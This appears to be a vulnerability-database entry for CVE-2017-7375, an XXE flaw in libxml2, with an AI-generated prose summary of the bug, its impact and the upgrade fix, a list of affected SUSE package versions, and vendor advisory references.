CVE-2017-7375
Description
libxml2 flaw allows remote XML External Entity (XXE) inclusion even with default parser flags, exposing local files or internal servers.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
libxml2 flaw allows remote XML External Entity (XXE) inclusion even with default parser flags, exposing local files or internal servers.
Vulnerability
CVE-2017-7375 is a flaw in libxml2 [2] where the XML parser processes external entities even when the caller does not request entity substitution, DTD validation, external DTD subset loading, or default DTD attributes [1]. Affected versions include all prior to 2.9.4-r3 [2]. This enables XML External Entity (XXE) injection under default parser flags, which normally prevent such attacks [1].
Exploitation
An attacker must provide a specially crafted XML document [2] and entice a user or application to parse it with libxml2's default flags [1]. No special authentication or network position is required beyond delivering the payload. The XXE attack proceeds by including a malicious DOCTYPE declaration with an external entity pointing to a local file, HTTP, or FTP URL [1].
Impact
Successful exploitation leads to disclosure of local file contents, or interaction with internal HTTP/FTP servers that may be otherwise unreachable [1]. This can expose sensitive data, credentials, or internal service information. In some contexts, the attacker may achieve remote code execution or denial of service [2]. The compromise occurs at the privilege level of the application using libxml2.
Mitigation
Upgrade to libxml2 version 2.9.4-r3 or later, as released for Gentoo on 2017-11-01 [2]. The Android security bulletin of June 2017 also includes the fix [1]. No known workaround exists [2]; systems using unpatched libxml2 should apply the update immediately.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
6- osv-coords5 versionspkg:rpm/suse/libxml2&distro=SUSE%20Linux%20Enterprise%20Server%2011%20SP4pkg:rpm/suse/libxml2&distro=SUSE%20Linux%20Enterprise%20Server%20for%20SAP%20Applications%2011%20SP4pkg:rpm/suse/libxml2&distro=SUSE%20Linux%20Enterprise%20Software%20Development%20Kit%2011%20SP4pkg:rpm/suse/libxml2-python&distro=SUSE%20Linux%20Enterprise%20Server%2011%20SP4pkg:rpm/suse/libxml2-python&distro=SUSE%20Linux%20Enterprise%20Server%20for%20SAP%20Applications%2011%20SP4
< 2.7.6-0.76.1+ 4 more
- (no CPE)range: < 2.7.6-0.76.1
- (no CPE)range: < 2.7.6-0.76.1
- (no CPE)range: < 2.7.6-0.76.1
- (no CPE)range: < 2.7.6-0.76.4
- (no CPE)range: < 2.7.6-0.76.4
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
8- security.gentoo.org/glsa/201711-01mitrevendor-advisoryx_refsource_GENTOO
- www.debian.org/security/2017/dsa-3952mitrevendor-advisoryx_refsource_DEBIAN
- www.securityfocus.com/bid/98877mitrevdb-entryx_refsource_BID
- www.securitytracker.com/id/1038623mitrevdb-entryx_refsource_SECTRACK
- android.googlesource.com/platform/external/libxml2/+/308396a55280f69ad4112d4f9892f4cbeff042aamitrex_refsource_CONFIRM
- bugzilla.redhat.com/show_bug.cgimitrex_refsource_CONFIRM
- git.gnome.org/browse/libxml2/commit/mitrex_refsource_CONFIRM
- source.android.com/security/bulletin/2017-06-01mitrex_refsource_CONFIRM
News mentions
0No linked articles in our index yet.